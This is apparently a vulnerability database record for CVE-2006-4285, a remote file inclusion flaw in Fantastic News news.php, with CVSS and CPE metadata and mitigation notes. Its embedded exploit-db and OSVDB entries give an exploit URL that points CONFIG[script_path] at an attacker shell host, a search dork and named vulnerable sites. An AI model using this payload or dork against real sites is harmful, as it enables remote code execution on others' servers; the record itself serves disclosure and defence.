ID CVE-2006-4285
Type cve
Reporter cve@mitre.org
Modified 2018-10-17T21:34:00
Description
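PHP remote file inclusion vulnerability in news.php in Fantastic News 2.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[script_path] parameter. NOTE: it was later reported that 2.1.5 is also affected. The root cause, visible in the code excerpt quoted in the referenced exploit-db entry, is that news.php builds its require_once() paths by prefixing $CONFIG['script_path'], a value that can be supplied in the request (classified here as CWE-94). Exposure presumably depends on PHP settings that let request parameters populate script variables and let include/require fetch URLs (register_globals, allow_url_fopen / allow_url_include); disabling those and deriving the include prefix from a server-side constant rather than a request-reachable variable removes the condition.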
{"id": "CVE-2006-4285", "bulletinFamily": "NVD", "title": "CVE-2006-4285", "description": "PHP remote file inclusion vulnerability in news.php in Fantastic News 2.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[script_path] parameter. NOTE: it was later reported that 2.1.5 is also affected.", "published": "2006-08-22T17:04:00", "modified": "2018-10-17T21:34:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4285", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/archive/1/457680/100/0/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/28469", "http://www.vupen.com/english/advisories/2006/3336", "http://fscripts.com/index.php", "https://www.exploit-db.com/exploits/2221", "http://www.securityfocus.com/bid/19613", "http://secunia.com/advisories/21571"], "cvelist": ["CVE-2006-4285"], "type": "cve", "lastseen": "2021-02-02T05:27:23", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:2221"]}, {"type": "osvdb", "idList": ["OSVDB:28031"]}], "modified": "2021-02-02T05:27:23", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-02-02T05:27:23", "rev": 2}, "vulnersScore": 7.3}, "cpe": ["cpe:/a:fscripts:fantastic_news:2.1.3", "cpe:/a:fscripts:fantastic_news:2.1.5", "cpe:/a:fscripts:fantastic_news:2.1.1", "cpe:/a:fscripts:fantastic_news:2.1.2"], "affectedSoftware": [{"cpeName": "fscripts:fantastic_news", "name": "fscripts fantastic news", "operator": "eq", "version": "2.1.1"}, {"cpeName": "fscripts:fantastic_news", "name": "fscripts fantastic news", "operator": "eq", "version": "2.1.3"}, {"cpeName": "fscripts:fantastic_news", "name": "fscripts fantastic news", "operator": "eq", "version": "2.1.5"}, {"cpeName": "fscripts:fantastic_news", "name": "fscripts fantastic news", "operator": "eq", "version": "2.1.2"}], "cvss2": 
{"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:fscripts:fantastic_news:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.5:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:fscripts:fantastic_news:2.1.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:fscripts:fantastic_news:2.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:fscripts:fantastic_news:2.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:fscripts:fantastic_news:2.1.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "2221", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/2221"}, {"name": "http://fscripts.com/index.php", "refsource": "MISC", "tags": ["Patch"], "url": "http://fscripts.com/index.php"}, {"name": "21571", "refsource": "SECUNIA", "tags": ["Patch", "Vendor Advisory", "Exploit"], "url": "http://secunia.com/advisories/21571"}, {"name": "19613", "refsource": "BID", "tags": ["Patch", "Exploit"], "url": "http://www.securityfocus.com/bid/19613"}, {"name": "20070121 Fantastic News <=- (news.php) Remote File Include Vulnerability", "refsource": "BUGTRAQ", "tags": [], "url": "http://www.securityfocus.com/archive/1/457680/100/0/threaded"}, {"name": "fantasticnews-news-file-include(28469)", "refsource": "XF", "tags": [], 
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28469"}, {"name": "ADV-2006-3336", "refsource": "VUPEN", "tags": ["Vendor Advisory"], "url": "http://www.vupen.com/english/advisories/2006/3336"}]}
{"exploitdb": [{"lastseen": "2016-01-31T15:47:13", "description": "Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability. CVE-2006-4285. Webapps exploit for php platform", "published": "2006-08-19T00:00:00", "type": "exploitdb", "title": "Fantastic News <= 2.1.3 script_path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4285"], "modified": "2006-08-19T00:00:00", "id": "EDB-ID:2221", "href": "https://www.exploit-db.com/exploits/2221/", "sourceData": "#==============================================================================================\n#Fantastic News <= v2.1.3 (CONFIG[script_path]) Remote File Inclusion Exploit\n#===============================================================================================\n# \n#Critical Level : Dangerous \n# \n#Venedor site : http://fscripts.com/ \n# \n#Version : v2.1.2 & v2.1.3 \n# \n#================================================================================================\n#\n#Dork : \"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"\n#\n#================================================================================================\n#\n#Bug in : news.php\n#\n#Vlu Code :\n#--------------------------------\n# require_once($CONFIG['script_path'].\"config.php\");\n# require_once($CONFIG['script_path'].\"functions/functions.php\");\n# require_once($CONFIG['script_path'].\"functions/mysql.php\");\n# require_once($CONFIG['script_path'].\"functions/template.php\");\n#\n#================================================================================================\n#\n#Exploit :\n#--------------------------------\n#\n#http://sitename.com/[Script Path]/news.php?CONFIG[script_path]=http://SHELLURL.COM?\n#\n#Example :\n# http://fscripts.com/ ====> vendor site =)) hahahahaaaaaa ====> 2.1.3\n# http://lnx.evanescencewebsite.com/PressArchive =====> 
2.1.2\n#\n#\n#\n#================================================================================================\n#Discoverd By : SHiKaA\n#\n#Conatact : SHiKaA-[at]hotmail.com\n#\n#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)\n==================================================================================================\n\n# milw0rm.com [2006-08-19]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2221/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4285"], "edition": 1, "description": "## Manual Testing Notes\nhttp://[target]/[Script Path]/news.php?CONFIG[script_path]=http://[attacker]?\n## References:\nVendor URL: http://fscripts.com/free.php?id=1\n[Secunia Advisory ID:21571](https://secuniaresearch.flexerasoftware.com/advisories/21571/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2221\nFrSIRT Advisory: ADV-2006-3336\n[CVE-2006-4285](https://vulners.com/cve/CVE-2006-4285)\nBugtraq ID: 19613\n", "modified": "2006-08-19T06:34:02", "published": "2006-08-19T06:34:02", "href": "https://vulners.com/osvdb/OSVDB:28031", "id": "OSVDB:28031", "type": "osvdb", "title": "Fantastic News news.php CONFIG[script_path] Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}